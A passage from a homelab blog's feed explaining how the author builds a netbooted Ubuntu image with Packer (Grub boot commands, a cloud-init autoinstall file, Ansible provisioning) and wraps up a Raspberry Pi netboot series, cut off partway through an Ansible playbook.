</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34; autoinstall&lt;wait&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    &#34; ds<span style="color:#f92672">=</span><span style="color:#66d9ef">nocloud</span><span style="color:#960050;background-color:#1e0010">-</span><span style="color:#66d9ef">net</span><span style="color:#960050;background-color:#1e0010">&lt;</span><span style="color:#66d9ef">wait</span><span style="color:#960050;background-color:#1e0010">&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    &#34;\\;s<span style="color:#f92672">=</span><span style="color:#66d9ef">http</span><span style="color:#960050;background-color:#1e0010">://&lt;</span><span style="color:#66d9ef">wait</span><span style="color:#960050;background-color:#1e0010">&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;{{.HTTPIP}}&lt;wait&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;:{{.HTTPPort}}/&lt;wait&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34; ---&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;&lt;enter&gt;&lt;wait&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;initrd /casper/initrd&lt;wait&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;&lt;enter&gt;&lt;wait&gt;&#34;</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#e6db74">&#34;boot&lt;enter&gt;&lt;wait&gt;&#34;</span>
</span></span><span style="display:flex;"><span>  ]
</span></span></code></pre></div><p>This is the part which amused me to no end. I had been asking myself how I would
be able to automate the changes in the Grub entries, and here I finally found the answer.
What happens here: Packer will capture the stdin of the booting medium (this is
still the Ubuntu install disk, not the finished image) and enter the commands
given in the <code>boot_command</code> option.</p>
<p>First, Packer waits a couple of moments and then starts with the input. It does
not read the screen or anything like that. Packer will simply input the
characters given in <code>boot_command</code> in the order given.</p>
<p>If you just boot up a VM with the Ubuntu Server live disk, you will see that the
first thing appearing is the Grub boot menu. Instead of using any entry from
there, the Packer setup will just enter Grub commands to start the boot. A console
can be opened in grub by pressing <code>c</code>. So that&rsquo;s exactly what happens here with
the very first input character: <code>c</code>. All of the <code>&lt;wait&gt;</code> entries just make
Packer wait for about one second before sending the next input.</p>
<p>We&rsquo;re now on the Grub command line. The next command sets the Linux kernel
grub should use. This is simply the kernel from the installer. The boot files
for the installer are automatically mounted at <code>/casper</code>.
Next come the Linux kernel parameters. The first one, <code>autoinstall</code>, makes
Ubuntu run the automatic install instead of asking the user any questions.</p>
<p>The next option, which ends up as <code>ds=nocloud-net\\;s=http://{{.HTTPIP}}:{{.HTTPPort}}/</code>
defines the location of the config file for the automatic installation.</p>
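<p>Put together, the line that ends up being typed at the Grub prompt looks roughly
like this; the IP and port are just example values for whatever Packer&rsquo;s HTTP
server happens to listen on:</p>
<pre tabindex="0"><code>linux /casper/vmlinuz autoinstall ds=nocloud-net\;s=http://10.0.2.2:8432/ ---
</code></pre>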
<p>In this case, the QEMU builder has a neat little function: it can start
an HTTP server locally, make it available to the booting VM, and serve
local files from there.
This server is configured in this part:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span>  http_content      <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>    &#34;/user-data&#34; <span style="color:#f92672">=</span> <span style="color:#66d9ef">templatefile</span>(<span style="color:#e6db74">&#34;${path.root}/files/ubuntu-metadata-template&#34;</span>,{
</span></span><span style="display:flex;"><span>      hn_hostname <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;${var.hn_hostname}&#34;</span>
</span></span><span style="display:flex;"><span>    })
</span></span><span style="display:flex;"><span>    &#34;/meta-data&#34; <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span></code></pre></div><p>This defines the content served by the HTTP server. The value is a simple map
<code>string</code> =&gt; <code>string</code>. In this instance, I&rsquo;m using the <a href="https://www.packer.io/docs/templates/hcl_templates/functions/file/templatefile">templatefile</a> function.
It allows me to use a local file to serve from the HTTP server, instead of
defining the entire file to deliver inside the Packer template file. Why? Because
I just don&rsquo;t like pasting multiline files into other files. If possible, I like
to keep separate files actually separate. The templated cloud-init user-data file
looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#75715e">#cloud-config</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">autoinstall</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">version</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">identity</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">hostname</span>: <span style="color:#e6db74">&#34;${hn_hostname}&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">password</span>: <span style="color:#e6db74">&#34;$6$exDY1mhS4KUYCE/2$zmn9ToZwTKLhCw.b4/b.ZRTIZM30JZ4QrOQ2aOXJ8yk96xpcCof0kxKwuX1kqLG/ygbJ1f8wxED22bTL4F46P0&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">username</span>: <span style="color:#ae81ff">ubuntu</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">locale</span>: <span style="color:#ae81ff">en_US.UTF-8</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">storage</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">layout</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">direct</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ssh</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">install-server</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">late-commands</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">echo &#39;ubuntu ALL=(ALL) NOPASSWD:ALL&#39; &gt; /target/etc/sudoers.d/sysuser</span>
</span></span></code></pre></div><p>The potential content of this file is described in the <a href="https://ubuntu.com/server/docs/install/autoinstall-reference">Ubuntu docs</a>.</p>
<p>One important thing to note: The comment <code>#cloud-config</code> at the beginning is
actually mandatory.</p>
<p>The <code>password</code> is the password for the initial user, which I have just called
<code>ubuntu</code>. The password is actually also <code>ubuntu</code> here, just already hashed in
crypt format for direct input into the shadow file.</p>
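<p>If you want a different password, the hash can be generated locally. These are
just two ways of doing it that should work on Ubuntu (<code>mkpasswd</code> comes from the
<code>whois</code> package):</p>
<pre tabindex="0"><code># both print a SHA-512 crypt hash suitable for the identity.password field
mkpasswd -m sha-512 ubuntu
openssl passwd -6 ubuntu
</code></pre>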
<p>For the storage definition, I did not want to do anything too complicated, so
I just went with the <code>direct</code> layout. This config gives you pretty much what you
would expect: A couple of hundred MB as the <code>/boot</code> partition, and the rest of
the disk formatted as ext4 as the root disk.</p>
<p>In addition, the <code>install-server</code> directive will install an SSH server.</p>
<p>Finally, highly important: Do not forget the last command under <code>late-commands</code>.
This entry adds the newly created <code>ubuntu</code> user as a sudoer. This is especially
important to remember when, like me, you are coming from using a preinstalled
Raspberry Pi Ubuntu image. In those images, the <code>ubuntu</code> user is already
installed and it is automatically added as a sudoer. Here, we need to do that
manually.</p>
<p>After the kernel command line is defined, the initrd is configured, again
just to the standard initrd. Finally, the <code>boot</code> command is entered, which makes
grub take the previously entered configuration and try to boot it.</p>
<p>Here was where I hit the next couple of problems. I saw a kernel panic at the
bottom of the boot output. Something about <code>unable to start init</code>. This indicates
that everything might be fine with the kernel, but something went wrong with
unpacking the initramfs. But I could not see anything more. For some reason,
the system did not react to my attempts at scrolling up, and the VM was launching
in a very low resolution - there was not very much of the console output visible.</p>
<p>Solving this again led me into an area of Linux I had had no reason to
explore in the past: Grub arguments and commands.</p>
<p>Before being able to fix the actual <em>no working init</em> problem, I needed to see
whether there were some other indications about what went wrong with the initramfs.
To do so, we can use the grub config option <code>gfxpayload</code>. This option can be
set either in the Grub config (which you can access in grub itself when pressing <code>e</code>)
or it can be entered in the Grub console, after pressing <code>c</code>.
The potential values for that option can be seen by entering the Grub
console with <code>c</code> and entering <code>vbeinfo</code>.</p>
<p>One example which should work for most modern machines is <code>gfxpayload=1024x768x8</code>.</p>
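<p>For reference, this is what that looks like when entered at the Grub console,
before the <code>linux</code>/<code>initrd</code>/<code>boot</code> commands; the resolution is simply the one
that worked for me:</p>
<pre tabindex="0"><code>grub&gt; vbeinfo
grub&gt; set gfxpayload=1024x768x8
</code></pre>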
<p>After that, I was finally able to see the real problem: I was seeing I/O errors
when the system tries to unpack the initramfs. First, I thought that was because
I was working on an NFS share as my working directory. But then I took a look at the
<code>/casper</code> directory on the Ubuntu disk. This directory actually contains a lot
of squashfs files for different host architectures and setups. And squashfs files
are not very small. Then it hit me: I had only configured about 1024 MB RAM for the
VM. And the initramfs is always placed in a ramdisk. So I was simply running out
of RAM when the VM was trying to unpack the initramfs.</p>
<p>Once I increased the VM RAM to 4096 MB the problem disappeared and the boot/install
went through without a problem.</p>
<h3 id="provisioning-with-ansible">Provisioning with Ansible</h3>
<p>The provisioning part is similar to the previous provisioning for the Pis,
described <a href="https://blog.mei-home.net/posts/rpi-netboot/image/">here</a>. I&rsquo;m using Ansible.</p>
<p>In contrast to the Pi image, the provisioning here is happening against a fully
running QEMU VM. The provisioner part of the Packer file looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">build</span> {
</span></span><span style="display:flex;"><span>  sources <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;source.qemu.ubuntu-generic&#34;</span>]
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">provisioner</span> <span style="color:#e6db74">&#34;ansible&#34;</span> {
</span></span><span style="display:flex;"><span>    user <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;ubuntu&#34;</span>
</span></span><span style="display:flex;"><span>    extra_arguments <span style="color:#f92672">=</span> [
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;foobar_pw<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">local</span>.<span style="color:#960050;background-color:#1e0010">foobar-pw</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;hn_hostname<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">var</span>.<span style="color:#960050;background-color:#1e0010">hn_hostname</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;hn_netboot<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">var</span>.<span style="color:#960050;background-color:#1e0010">hn_netboot</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;hn_ceph_key<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">local</span>.<span style="color:#960050;background-color:#1e0010">hn_ceph_key</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;hn_host_id<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">var</span>.<span style="color:#960050;background-color:#1e0010">hn_host_id</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;ansible_become_password<span style="color:#f92672">=</span><span style="color:#66d9ef">ubuntu</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#e6db74">&#34;--become&#34;</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#e6db74">&#34;-v&#34;</span>
</span></span><span style="display:flex;"><span>    ]
</span></span><span style="display:flex;"><span>    ansible_ssh_extra_args <span style="color:#f92672">=</span> [
</span></span><span style="display:flex;"><span>      &#34;-o IdentitiesOnly<span style="color:#f92672">=</span><span style="color:#66d9ef">yes</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34; -o HostkeyAlgorithms<span style="color:#f92672">=</span><span style="color:#960050;background-color:#1e0010">+</span><span style="color:#66d9ef">ssh</span><span style="color:#960050;background-color:#1e0010">-</span><span style="color:#66d9ef">rsa</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34; -o PubkeyAcceptedAlgorithms<span style="color:#f92672">=</span><span style="color:#960050;background-color:#1e0010">+</span><span style="color:#66d9ef">ssh</span><span style="color:#960050;background-color:#1e0010">-</span><span style="color:#66d9ef">rsa</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>    ]
</span></span><span style="display:flex;"><span>    playbook_file <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;${path.root}/../bootstrap-ubuntu-image.yml&#34;</span>
</span></span><span style="display:flex;"><span>    use_sftp <span style="color:#f92672">=</span> <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>There were several problems when I was launching the provisioning. First of all,
a good tip for debugging provisioner problems: Add the command line switch
<code>-on-error=ask</code> to your Packer invocation. This means that if the provisioning
step fails after the build step, Packer will not just stop and remove all files.
Instead, you will be asked what
to do. One option is to repeat the provisioning step. This even reloads the
Ansible playbook, so you can try out multiple changes in your playbook, without
having to wait for the full Ubuntu installation again.</p>
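<p>For completeness, such an invocation might look something like this; the template
file name and the variable values are placeholders, not my actual ones:</p>
<pre tabindex="0"><code>packer build -on-error=ask \
  -var &#34;hn_hostname=sobek&#34; \
  -var &#34;hn_netboot=true&#34; \
  -var &#34;hn_host_id=&lt;client machine id&gt;&#34; \
  ubuntu-generic.pkr.hcl
</code></pre>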
<p>The first problem I hit was that any file transfer, e.g. use of the <code>copy</code> module,
did not work at all. The only thing working was the <code>raw</code> module, because that
is not actually a Python module that needs to be copied, but just runs the
command given.
I must admit that I still do not know what the actual problem was. In the end,
I just had to add the option <code>use_sftp</code>. This makes use of SFTP for copying
files instead of SCP.</p>
<p>Another hurdle was the recent deprecation of the <code>ssh-rsa</code> algorithm in
OpenSSH. Quite frankly, I don&rsquo;t know what is creating the problem here.
Both on Ubuntu and on the machine I was executing Packer on, OpenSSH is
very current. The only thing I can imagine: The QEMU builder says that it uses
an SSH proxy to connect the local host with the VM. It&rsquo;s possible that this SSH
proxy does not support the new algorithm yet. Or the problem might simply be
the SSH key generated by the QEMU builder. I did not dig too deep into this
problem and just added the <code>-o HostKeyAlgorithms=+ssh-rsa</code> and
<code>-o PubkeyAcceptedAlgorithms=+ssh-rsa</code> options to the extra Ansible SSH args.</p>
<p>And that&rsquo;s it. Now the only thing remaining is the deployment. For that, I
execute the Packer build. Then, I take the resulting image and put it onto a
newly created 50 GB Ceph RBD volume. In addition, I&rsquo;ve got a small playbook
which generates the necessary Syslinux configuration and puts it onto my
netboot server, together with the Kernel and initramfs from <code>/boot</code>.
Now I just need to boot the Udoo, et voilà: I&rsquo;ve got a fully
diskless Udoo with Ubuntu Server running, with my internal Ansible user already
created and ready for the execution of my full deployment playbook.</p>
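<p>The RBD part of that is not very involved. Roughly, it boils down to something
like the following; the pool and image names follow the examples above, and note
that <code>rbd import</code> sizes the image to the input file, so it needs to be grown
afterwards (older Ceph releases want the size as a plain number of megabytes
instead of <code>50G</code>):</p>
<pre tabindex="0"><code># write the raw Packer output into a new RBD image, then grow it to 50 GB
rbd import output_sobek/sobek pi-cluster/sobek
rbd resize --size 50G pi-cluster/sobek
</code></pre>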
<p>As mentioned in the introduction, the Udoo serves as a Nomad cluster node. It is
doing its job pretty well and has not caused any problems in the roughly 10 days
I have had it deployed.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Netboot Raspberry Pi Part VI: Conclusion</title>
      <link>https://blog.mei-home.net/posts/rpi-netboot/conclusion/</link>
      <pubDate>Sun, 25 Sep 2022 12:10:00 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/rpi-netboot/conclusion/</guid>
      <description>A short conclusion for the Netboot Pi series and blogging in general</description>
      <content:encoded><![CDATA[<p>Finally, the <a href="https://blog.mei-home.net/posts/rpi-netboot/intro/">Netboot Raspberry Pi series</a>
concludes with this post. I will be going over both what figuring out the actual
netboot was like and what blogging about it was like.</p>
<p>If you&rsquo;ve followed this series, I&rsquo;m hoping that you&rsquo;ve learned a lot more than
&ldquo;just&rdquo; how to produce an image that can netboot a Raspberry Pi 4. For me, the
information on the side, like how the initramfs works in the Linux boot process,
was more interesting than the netboot itself.</p>
<p>If I ever need to do something
other than using a Ceph RBD as my root device, I already know that it&rsquo;s not more
difficult than writing a bit of Bash scripting.</p>
<p>This netbooting Pi setup was the trigger for me to finally get into blogging.
There were a couple of comments in the Turing Pi 2 community about how netbooting
Pis always felt a little bit like weaving a couple of arcane incantations and
suddenly it worked. When I finally figured out how it all fit together, I wanted
to share that knowledge, but Discord is not exactly the right place for long form
content. So I decided to finally get started with technical blogging. That it
was another thing I could self-host also helped. &#x1f609;</p>
<p>And I like it. Writing these articles was interesting and fun. I&rsquo;ve got a lot of
experience with technical writing, e.g. for JIRA tickets at work. I really would
have liked for somebody to tell me beforehand that becoming a technical lead would
mean I would become more familiar with whatever Atlassian calls their JIRA markup
language than any actual programming language. &#x1f605;
But with these blog posts, writing felt a lot more relaxed. There was no pressure
to get the posts written by a future deadline so that they could be groomed
in time for the next sprint. There was no need to take into account the possibility
that total newcomers would get the tickets and need an explanation of absolutely
everything.</p>
<p>But there was one thing which was nagging me: I&rsquo;ve done a CS degree at university.
And while that included a lot of writing, it was that special beast that is
academic writing. Not the style I wanted to go for with this blog. So is there
some sort of &ldquo;tech blogger style guide&rdquo;? Something more substantial than &ldquo;Here are
12 points each blogger should heed&rdquo;? Some good book perhaps, on technical writing?
I would be grateful for any and all pointers.</p>
<p>And I definitely need help in this area. I&rsquo;ve not been thinking a lot about style
in these posts, but I have already realized I committed some no-goes. For example,
I&rsquo;m often switching between &ldquo;Next, I will&hellip;&rdquo;, &ldquo;Next we should&hellip;&rdquo;, &ldquo;Next you
should&hellip;&rdquo; in one and the same article. If I remember correctly, this is a bad
thing. I&rsquo;m hoping this hasn&rsquo;t grated too much on my readers up to this point.</p>
<p>So what to expect in the future? I will definitely keep the blog up. As said
above, writing is fun. I will be continuing with these tutorial style posts
about things I&rsquo;m doing in my homelab.</p>
<p>One important goal: Write posts about things right after I have finished them.
I&rsquo;ve already got a list of articles I want to write about things I have set up
in the homelab since I started the netbooting Pi series, but did not start yet
because I forced myself to first finish this series. I believe it is going to be
more fun to write a blog article right after I have finished implementing
something new, instead of keeping a long list of potential articles and writing
them months after the fact.</p>
<p>One article I have already started is about the <a href="https://shop.udoo.org/en/udoo-x86-ii-ultra.html">Udoo X86 II Ultra</a> I set up last weekend. This machine is also netbooted, but in contrast to
the Pi, it has a more &ldquo;standard&rdquo; PXE boot. I also had to go a different route
when preparing the Packer image, so I think it will make for an interesting
article.</p>
<p>Then I will follow up with some more general pieces on my homelab: first on
the setup I&rsquo;m currently running, and then one on its 10-year history. I want to
describe each stage of the homelab, why I made those decisions at the time, and
what worked and what did not.</p>
<p>Finally, a request: If you&rsquo;ve been reading a couple of posts in this series,
shoot me a short comment, for example on <a href="https://twitter.com/michael_mmeier">Twitter</a>
or, preferably, <a href="https://social.mei-home.net/@mmeier">Mastodon</a>. I am especially
interested in comments on style.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Netboot Raspberry Pi Part V: Ansible Playbook</title>
      <link>https://blog.mei-home.net/posts/rpi-netboot/playbook/</link>
      <pubDate>Sun, 25 Sep 2022 01:12:00 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/rpi-netboot/playbook/</guid>
      <description>Using an Ansible Playbook for Packer provisioning of a netbooting Pi 4</description>
      <content:encoded><![CDATA[<p>This is the fifth part of my Raspberry Pi netboot series. The introduction with
an overview and links to previous articles can be found <a href="https://blog.mei-home.net/posts/rpi-netboot/intro/">here</a>.</p>
<p>In this post, we will go over the Ansible playbook I use to provision my Pis.
This playbook is not intended to fully provision the Pi for use; e.g. it will
not set up Nomad or Ceph. It only prepares the image for netbooting and sets up
my normal Ansible user for the main provisioning playbooks, which run after
first boot.</p>
<p>In the playbook, I&rsquo;m using a couple of files for setting up the initramfs for
mounting a Ceph RBD volume. The approach was taken from <a href="https://github.com/ltsp/ltsp/pull/50">this PR</a>
and slightly adapted. A full description of those files&rsquo; contents can be found
in <a href="https://blog.mei-home.net/posts/rpi-netboot/initramfs/">Part III</a> of the series.
These files can be found in <a href="https://gist.github.com/mmeier86/97d8d55073ebcd4c832d7cc8a76241e7">this gist on GitHub</a> for ease of copying.</p>
<h1 id="caveats">Caveats</h1>
<p>There are a couple of caveats when using Packer and the <a href="https://github.com/mkaczanowski/packer-builder-arm">packer-builder-arm</a> builder.
The builder does not launch a full VM, but merely mounts the image and then
chroots into it. This means that things like checking the running kernel version
or the system architecture with standard Ansible facts will not work, because
the kernel Ansible sees is the one from the host you are running Packer on, not
that of the actual host you are provisioning.
This is why a <code>hn_pi</code> variable is used throughout the playbook to identify
whether we are preparing an image for a Pi or for a more standard host.</p>
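<p>To make the pattern concrete, here is a minimal sketch (not taken from the actual
playbook) of a task guarded this way; the task body is just an illustrative
<code>debug</code> call:</p>
<pre tabindex="0"><code>    # Only runs when the hn_pi extra-var was passed in by Packer,
    # i.e. when the image being built is for a Raspberry Pi.
    - name: example of a Pi-only task
      debug:
        msg: "Building a Raspberry Pi image for {{ hn_hostname }}"
      when: hn_pi is defined
</code></pre>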
<h1 id="how-its-invoked">How it&rsquo;s invoked</h1>
<p>To reiterate from my <a href="https://blog.mei-home.net/posts/rpi-netboot/image/">previous article</a>
on the Packer setup, this is how the <a href="https://www.packer.io/plugins/provisioners/ansible/ansible">Ansible provisioner</a>
is configured:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span>  <span style="color:#66d9ef">provisioner</span> <span style="color:#e6db74">&#34;ansible&#34;</span> {
</span></span><span style="display:flex;"><span>    extra_arguments <span style="color:#f92672">=</span> [
</span></span><span style="display:flex;"><span>      &#34;--connection<span style="color:#f92672">=</span><span style="color:#66d9ef">chroot</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--inventory-file<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">local</span>.<span style="color:#960050;background-color:#1e0010">mountpath</span><span style="color:#e6db74">}</span>,<span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--limit<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">local</span>.<span style="color:#960050;background-color:#1e0010">mountpath</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;foobar_pw<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">local</span>.<span style="color:#960050;background-color:#1e0010">foobar-pw</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;hn_hostname<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">var</span>.<span style="color:#960050;background-color:#1e0010">hn_hostname</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;hn_netboot<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">var</span>.<span style="color:#960050;background-color:#1e0010">hn_netboot</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;hn_host_id<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">var</span>.<span style="color:#960050;background-color:#1e0010">hn_host_id</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;hn_ceph_key<span style="color:#f92672">=</span><span style="color:#e6db74">${</span><span style="color:#960050;background-color:#1e0010">local</span>.<span style="color:#960050;background-color:#1e0010">hn_ceph_key</span><span style="color:#e6db74">}</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      &#34;--extra-vars&#34;, &#34;hn_pi<span style="color:#f92672">=</span><span style="color:#66d9ef">true</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>      <span style="color:#e6db74">&#34;--user&#34;, &#34;ubuntu&#34;</span>,
</span></span><span style="display:flex;"><span>    ]
</span></span><span style="display:flex;"><span>    playbook_file <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;${path.root}/../bootstrap-ubuntu-image.yml&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span></code></pre></div><p>Note especially the <code>connection=chroot</code> option, which tells Ansible to use chroot
instead of the default SSH connection. This is required when using packer-builder-arm
because that builder makes use of chroot instead of launching a VM.</p>
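<p>The extra-vars passed here are what the playbook&rsquo;s <code>when</code> guards rely on later.
If you want to fail fast when one of them is missing, a small sketch like the
following (not part of my actual playbook) could be prepended as its own play:</p>
<pre tabindex="0"><code>- hosts: all
  name: sanity-check variables handed over by Packer
  gather_facts: no
  tasks:
    - name: fail early if a required extra-var is missing
      assert:
        that:
          - hn_hostname is defined
          - hn_netboot is defined
          - hn_host_id is defined
</code></pre>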
<h1 id="the-playbook">The playbook</h1>
<p>Here is the playbook itself:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">hosts</span>: <span style="color:#ae81ff">all</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Bootstrap python for ansible</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">gather_facts</span>: <span style="color:#66d9ef">no</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">pre_tasks</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">install ansible dependencies</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">bootstrap</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">raw</span>: <span style="color:#ae81ff">apt -y install python3 sudo</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">hosts</span>: <span style="color:#ae81ff">all</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">setup host</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tasks</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">create user foobar</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">foobar</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">ansible</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">user</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">name</span>: <span style="color:#ae81ff">foobar</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">create_home</span>: <span style="color:#66d9ef">yes</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">shell</span>: <span style="color:#ae81ff">/bin/bash</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">groups</span>: <span style="color:#e6db74">&#39;&#39;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">configure SSH key for foobar</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">foobar</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">ansible</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">authorized_key</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">user</span>: <span style="color:#ae81ff">foobar</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
